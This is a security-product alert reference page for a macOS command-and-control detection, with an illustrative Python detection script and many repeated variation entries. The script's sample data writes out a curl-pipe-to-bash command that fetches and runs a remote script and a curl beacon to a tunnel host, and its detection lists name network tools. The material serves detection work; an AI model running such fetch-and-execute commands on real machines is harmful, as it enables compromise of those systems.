Uncommon macOS process communication to a rare external host

Cortex XSIAM Analytics Alert Reference by Alert name

Product
Cortex XSIAM
Last date published
2026-05-10
Category
Analytics Alert Reference
Index by
Alert name

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

N/A (single event)

Deduplication Period

1 Day

Required Data

  • Requires:
    • XDR Agent

Detection Modules

Detector Tags

Abnormal Communication Analytics

ATT&CK Tactic

Command and Control (TA0011)

ATT&CK Technique

Application Layer Protocol (T1071)

Severity

Informational

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.
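The following script is an added illustration and not Cortex XSIAM code (the product's rarity model is not public). Over constructed XDR-style network events it builds a 30-day baseline of which endpoints each process image and each external host were seen on, raises an alert when a process that is uncommon in the baseline reaches a host that is rare in it, suppresses repeats of the same endpoint/process/host for one day, and tags each alert with the variation names and severities listed on this page. The field names, thresholds, deduplication key, variation precedence and the TLD, tunnel and messaging-API lists are all assumptions made for the example; the security testing tool variation is omitted because its signal is not in this sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address

# Windows come from the alert synopsis; every threshold and list below is an
# assumption made for this example, not a documented Cortex XSIAM setting.
TRAINING_DAYS = 30
DEDUP_WINDOW = timedelta(days=1)
UNCOMMON_PROCESS_MAX_ENDPOINTS = 2   # process seen on this many endpoints or fewer => "uncommon"
RARE_HOST_MAX_ENDPOINTS = 1          # host reached by this many endpoints or fewer => "rare"
INTERNAL_SUFFIXES = (".corp.example",)                        # assumed internal DNS suffix
CLI_UTILITIES = {"curl", "wget", "nc", "python3", "osascript"}
COMMON_TLDS = {"com", "net", "org", "io", "dev", "edu", "gov"}
ABUSED_TLDS = {"xyz", "top", "zip", "click"}
MESSAGING_API_HOSTS = {"api.telegram.org", "discord.com", "hooks.slack.com"}
TUNNEL_HOSTS = {"ngrok.io", "trycloudflare.com", "loca.lt"}   # assumed LOTTunnels subset
CLI_VARIANTS = [  # (regex on the command line, variation suffix); order is assumed
    (r"\|\s*(ba|z)?sh\b", "and piping to script"),
    (r"\bchmod\b", "to download and change permission"),
    (r"/tmp/", "and saving data to a temporary folder"),
    (r"\.(sh|py|scpt)\s*$", "and downloading a script"),
]

def is_external(dest):
    """True for public IPs and for hostnames outside the organization's suffixes."""
    try:
        return ip_address(dest).is_global
    except ValueError:
        return not dest.lower().endswith(INTERNAL_SUFFIXES)

def build_baseline(events):
    """Training: distinct endpoints per process image and per external host."""
    proc_endpoints, host_endpoints = defaultdict(set), defaultdict(set)
    for e in events:
        proc_endpoints[e["process"]].add(e["endpoint"])
        if is_external(e["dest"]):
            host_endpoints[e["dest"]].add(e["endpoint"])
    return proc_endpoints, host_endpoints

def classify_variation(e):
    """Map event features to a variation name and the severity this page lists for it.
    Higher-severity checks run first; that precedence is an assumption."""
    cmd, dest = e["cmdline"], e["dest"].lower()
    tld = dest.rsplit(".", 1)[-1]
    is_cli = e["process"].rsplit("/", 1)[-1] in CLI_UTILITIES
    if tld in ABUSED_TLDS:
        return "with a frequently abused TLD", "Medium"
    if is_cli and dest in MESSAGING_API_HOSTS:
        return "while using a CLI utility to establish a connection with a messaging service API", "Medium"
    if any(dest == h or dest.endswith("." + h) for h in TUNNEL_HOSTS):
        return "related to LOTTunnels", "Low"
    if is_cli:
        if not e["parent_signed"]:   # the CLI utility was launched by an unsigned parent
            return "while using a CLI utility running by an unsigned process", "Low"
        for pattern, suffix in CLI_VARIANTS:
            if re.search(pattern, cmd):
                return "while using a CLI utility " + suffix, "Low"
    if tld not in COMMON_TLDS:
        return "with a rare TLD", "Low"
    return ("while using a CLI utility", "Low") if is_cli else ("", "Informational")

def detect(baseline, events):
    """Activation: alert on uncommon process -> rare external host, deduplicated
    per (endpoint, process, host) for DEDUP_WINDOW."""
    proc_endpoints, host_endpoints = baseline
    alerts, last_alert = [], {}
    for e in sorted(events, key=lambda x: x["ts"]):
        if not is_external(e["dest"]):
            continue
        uncommon = len(proc_endpoints.get(e["process"], ())) <= UNCOMMON_PROCESS_MAX_ENDPOINTS
        rare = len(host_endpoints.get(e["dest"], ())) <= RARE_HOST_MAX_ENDPOINTS
        if not (uncommon and rare):
            continue
        key = (e["endpoint"], e["process"], e["dest"])
        if key in last_alert and e["ts"] - last_alert[key] < DEDUP_WINDOW:
            continue
        last_alert[key] = e["ts"]
        variation, severity = classify_variation(e)
        alerts.append({**e, "variation": variation, "severity": severity})
    return alerts

# Constructed sample telemetry (not real XDR agent data); the field names are assumed.
SAFARI, CURL, BREW = "/Applications/Safari.app/Contents/MacOS/Safari", "/usr/bin/curl", "/usr/local/bin/brew"
T0 = datetime(2026, 4, 1, 9, 0)
ACTIVE = T0 + timedelta(days=TRAINING_DAYS)

def _ev(ts, endpoint, process, cmdline, dest, parent_signed=True):
    return {"ts": ts, "endpoint": endpoint, "process": process, "cmdline": cmdline,
            "dest": dest, "parent_signed": parent_signed}

TRAINING_EVENTS = (
    [_ev(T0 + timedelta(days=i), f"mac-{i:02d}", SAFARI, "Safari", "www.example.com") for i in range(20)]
    + [_ev(T0 + timedelta(days=3), f"mac-{i:02d}", CURL, "curl -O https://pkg.example-cdn.com/t.tgz", "pkg.example-cdn.com") for i in (1, 2)]
    + [_ev(T0 + timedelta(days=5), f"mac-{i:02d}", BREW, "brew upgrade", "ghcr.io") for i in range(5)]
)
PIPE_CMD = "curl -fsSL https://dl.stage-host.com/run.sh | bash"
ACTIVATION_EVENTS = [
    _ev(ACTIVE, "mac-07", CURL, PIPE_CMD, "dl.stage-host.com"),
    _ev(ACTIVE + timedelta(hours=2), "mac-07", CURL, PIPE_CMD, "dl.stage-host.com"),   # deduplicated
    _ev(ACTIVE + timedelta(hours=3), "mac-03", SAFARI, "Safari", "rare-site.xyz"),     # common process: no alert
    _ev(ACTIVE + timedelta(hours=4), "mac-09", CURL, "curl -s https://api.telegram.org/bot123/getUpdates", "api.telegram.org"),
    _ev(ACTIVE + timedelta(hours=5), "mac-04", "/Users/bob/Downloads/helper", "./helper", "10.0.0.5"),  # internal: skipped
    _ev(ACTIVE + timedelta(hours=6), "mac-05", CURL, "curl https://1a2b.ngrok.io/beacon", "1a2b.ngrok.io"),
    _ev(ACTIVE + timedelta(days=2), "mac-07", CURL, PIPE_CMD, "dl.stage-host.com"),    # dedup window expired
]

if __name__ == "__main__":
    for a in detect(build_baseline(TRAINING_EVENTS), ACTIVATION_EVENTS):
        print(a["ts"], a["endpoint"], a["process"], "->", a["dest"], "|", a["severity"], a["variation"])
```

Run as written, the sample produces four alerts: the curl-pipe-to-bash on mac-07, the curl to the messaging API on mac-09, the curl to the tunnel host on mac-05, and the mac-07 connection again two days later once the one-day deduplication window has passed; the Safari connection is suppressed because Safari is common in the baseline, and the internal destination never reaches the rarity check. The rarity counts are per distinct endpoint rather than per event, which is what keeps a single noisy host from making a destination look common.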

Variations

Uncommon macOS process communication to a rare external host by security testing tool

Synopsis

ATT&CK Tactic

Command and Control (TA0011)

ATT&CK Technique

Application Layer Protocol (T1071)

Severity

High

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host with a frequently abused TLD

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Medium

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility to establish a connection with a messaging service API

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Medium

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host related to LOTTunnels

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host with a rare TLD

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility and piping to script

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility to download and change permission

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility running by an unsigned process

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility and saving data to a temporary folder

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility and downloading a script

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.


Uncommon macOS process communication to a rare external host while using a CLI utility

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

An uncommon process is connecting to an external host that is rarely accessed within the organization.
This connection pattern is consistent with malicious activity such as command-and-control communication or malware download.

Attacker's Goals

Establish a remote backdoor to issue instructions, deploy additional payloads, and maintain long-term persistence across the infected fleet.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also contacting the suspicious host.
  • Inspect the host or URL for suspicious indicators or its presence in malicious reputation lists.